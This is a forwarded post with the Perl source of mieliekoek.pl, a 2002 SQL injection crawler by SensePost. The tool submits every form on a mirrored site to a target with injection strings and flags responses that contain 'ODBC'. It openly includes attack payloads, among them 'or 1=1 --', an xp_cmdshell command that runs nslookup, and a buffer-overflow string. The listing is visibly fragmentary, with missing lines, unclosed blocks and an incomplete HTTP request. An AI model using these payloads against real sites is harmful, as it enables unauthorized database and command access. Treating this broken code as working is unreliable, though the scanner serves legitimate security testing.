Mieliekoek.pl is a SQL insertion crawler which tests all forms on a web site for possible SQL insertion problems. This script takes the output of a web mirroring tools as input, inspecting every file and determine if there is a form in the file.
---------- Forwarded message ----------
# mieliekoek - SQL insertion crawler
# Test all forms on a web site for possible SQL insertion problems.
# This script takes the output of a web mirroring tools as input. It
# inspects every file and determine if there is a form in the file. If so it
# tries to do some some form of SQL insertion (inserts blah' in all fields)
# and looks at the output - if it sees "ODBC" it marks the form as
# vulnerable. Of course this is a very lame test - another would be to do a
# xp_cmdshell with a nslookup and see if the UDP packets gets back to you on
# port 53 - a better test, but not intergrated in here. Output is written in
# a file called <website>.report and contains all kinds of nice goodies.
# Have a look.
# The script has some intelligence regarding the parsing of forms. Note that
# the script always send the POST to the target - the second parameter -
# thus not always to the site that is used in the action of the form. This
# was done to make sure you dont attack something like topsecret.nsa.gov by
# mistake just because someone has a form that posts to their site.
# Usage: perl mieliekoek.pl <path to mirrored files> <target> <debug>
# e.g. perl mieliekoek.pl /tmp/websites/www.a.com/www.a.com www.a.com xx
# Use the script with HTTrack (web mirroring tool). HTTrack is very cool and
# works very nicely in Unix. It's also nice because it populates the action
# field in a form with the absolute path and not the relative path
# (http://www.httrack.com/httrack-3.15-2.tar.gz). The script does a simple
# "find" in the path specified and reads all the files from STDIN. Debug is
# either "x" for small amounts of debug info or "xx" for large amounts.
# You can also use this script to test for buffer overflows in home grown
# web applications by sending overly huge amounts of crap. See the code.
# Enjoy,
# Roelof Temmingh (roelof@sensepost.com)
# http://www.sensepost.com
# 2002/02/22
use Socket;
# What are we sending today? (uncomment the one you like best)
#$badstring="blah' or 1=1 --";
#$badstring="blah' exec master..xp_cmdshell 'nslookup a.com' --";
#$badstring=('X' x 2050);
($path)=@ARGV[0]; ($target)=@ARGV[1]; ($debug)=@ARGV[2];
$masterforms=0; $vulnforms=0; $acin=0;
@files=`find $path | sort`;
foreach $file (@files){
if (length($debug)>1){print "f.";}
if (($file =~ /html/i) || ($file =~ /asp/i)){
$flag=-1; $in=-1;
open (IN, $file) || die "Cannot open file $file\n";
#get the page in one large chunk
close (IN);
##clear the buffers (300 forms per page?)
for ($l=0; $l<300; $l++){
foreach $line (@page){
$line =~ s/\n//g; $line =~ s/\r//g;
for ($i=0; $i <= $#chars; $i++){
#detects open bracket
if ((@chars[$i] eq '<') && ($flag==-1)) {$flag=0;}
#detects "form "
if ($flag==0) {
if ($isform =~ /<form /i) {
#detects end of form statement
if ($flag==1) {
if (@chars[$i] eq '>') {
#detects end of complete form
if ($flag==2){
if ($isformend =~ /\/form/i) {
} else {$form[$in]=$form[$in].@chars[$i];}
## ## OK we got the forms - now we need to parse it
# first the form actions etc.
for ($i=0; $i<$in+1; $i++){
##extract header
for ($j=2; $j<length($workheader); $j++) {
$theaction=extract(" action",$line);
if (length($theaction)<1) {
# if there is no action we need to post to ourselfs - yuk!
## insert the action into a list (we dont wanna check the same ASP 200 times)
if ($actions{$theaction} eq 1) {
print "\n\nFile $file\n [$theaction]\n";
qprint ("\n===========================\n File $file Form [$theaction]\n===========================\n");
#extracts body of form
if ($actions{$theaction} eq 1) {
qprint ("FORM:\nv v v v v v v v v v v v v v v v v v v v v v v v v v\n");
qprint ("<for$workheader $work/form>\n^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^\n\n");
for ($j=2; $j<length($work); $j++) {
if (length($debug)>1){print ".p";}
#### drop down list (once)
if ($line =~ /<select /i){
$thename = extract(" name",$line);
qprint ("[$thetype] [$thename] [$thevalue]\n");
elsif ($line =~ /input/i) {
$thetype = extract("type",$line);
$thename = extract(" name",$line);
#### checkbox (once)
if ($thetype =~ /checkbox/i) {
if ($checkbox{$thename} == 1){
### radio button (once)
elsif ($thetype =~ /radio/i) {
if ($radio{$thename} == 1){
else {
$thevalue = extract("value",$line);
#### populate with the bad stuff
if (($thetype !~ /mailto/i) && (length($thename) > 0)){
### check if its a submit button - then preserve the submit
if ($thetype =~ /submit/i) {
$thevalue =~ s/ /\+/g;
else {$poststring=$poststring.$badstring;}
qprint ("[$thetype] [$thename] [$thevalue]\n");
qprint ("--------------------------------\n");
## ## we build the actual POST ourselves
# remove the last &
for ($p=0; $p<$#newpoststring; $p++){
## build the POSTSTRING - translations
$newpoststring =~ s/\,/%2c/g; $newpoststring =~ s/\>/%3e/g;
$newpoststring =~ s/\+/%2b/g; $newpoststring =~ s/\@/%40/g;
$newpoststring =~ s/ /\+/g;
##build the real action
for ($o=3; $o<$#actions; $o++){
POST $postaction HTTP/1.0
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; TUCOWS; Q312461)
Content-Length: $plength
Host: $target
Content-Type: application/x-www-form-urlencoded
#send it off
if (length($debug)>0){qprint ("We sent:\n---------\n$xtosend");}
qprint ("Response\n----------\n");
qprint (@results);
#check if vulnerable
foreach $line (@results){
if ($line =~ /ODBC/i) {$vuln=1;}
if ($vuln==1){
qprint ("\n=========>>>Form should be vulnerable<<<=========\n");
print "\n==>Form should be vulnerable!\n";
$newpoststring=""; $poststring="";
print "\nFinished...\n$#files files\n$masterforms forms\n$vulnforms vulnerable forms\n";
### subs
sub addstring {
for ($p=$start-1 ;; $p++){
if ((@temp[$p] eq $marker) || ($p > $#temp)){last;}
return $myscalar;
sub extract {
$passed =~ s/[<>]//g;
if ($real2 =~ /\"/){($duh,$real3,$duh)=split(/\"/i,$real2);}
else {($real3,$duh)=split(/ /,$real2)};
return $real3;
sub sendraw2 {
my ($pstr,$realport,$realip,$timeout)=@_;
$target2 = inet_aton($realip);
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
if(connect(S,pack "SnA4x8",2,$realport,$target2)){
my @in;
select(S); $|=1; print $pstr;
if (length($debug)>1){print STDOUT "r.";}
if ($flagexit == 1){close (S); print STDOUT "Timeout\n"; return "Timeout"; }
push @in, $_;
select(STDOUT); close(S);
return @in;
} else {return ""; }
sub ermm{
close (S);
sub qprint
open(db,">>$target.report") || die "Couldnt open quickwrite\n";
print db @_;
close (db);
#spidermark sensepostdata mieliekoek
Roelof W Temmingh SensePost IT security
roelof@sensepost.com +27 83 448 6996
http://www.sensepost.com http://www.hackrack.com